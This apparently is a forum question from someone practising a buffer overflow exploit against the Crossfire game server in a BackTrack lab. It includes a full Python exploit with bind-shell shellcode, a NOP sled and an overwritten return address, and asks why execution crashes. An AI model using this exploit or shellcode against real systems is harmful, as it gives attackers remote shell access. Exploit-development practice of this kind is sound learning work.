I am practicing Linux buffer overflow exploitation. when trying to exploit a vulnerability in crossfire, everything works well and I get the shellcode placed in the right place, and the program flow gets redirected to shellcode, however, when start executing the shell code, the program fails.
OS version (bt5 R3): Linux bt 3.2.6 #1 SMP Fri Feb 17 10:40:05 EST 2012 i686 GNU/Linux
exploit code:
import socket, sys
host = sys.argv[1]
//0x8134e77 jump eax
//0xb7dadad6 nop sled address
shellcode= ("\xcc\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80"
"\x5b\x5e\x52\x68\xff\x02\x11\x5c\x6a\x10\x51\x50\x89\xe1\x6a"
"\x66\x58\xcd\x80\x89\x41\x04\xb3\x04\xb0\x66\xcd\x80\x43\xb0"
"\x66\xcd\x80\x93\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x68\x2f"
"\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0"
"\x0b\xcd\x80")
crash = "\x90" *199 + shellcode + "\x43" * 4090 + "\xd6\xda\xda\xb7" + "D" * 7
buffer= "\x11(setup sound " + crash + "\x90\x00#"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "[*]Sending evil buffer..."
s.connect((host, 13327))
print (s.recv(1024))
s.send(buffer)
s.close()
print "[*]Payload Sent !"
I placed a break point before the shellcode and the execution flow hits it successfully, however, after continuing the program crashes and gives the following message: "Program received signal SIGSEGV, Segmentation fault. 0xb7daeb36 in ?? ()"
When inspecting this address, it's full of zeros!
I already disabled ASLR before starting the exercise and I am wondering does any other protection mechanism exist that prevents exploitation?
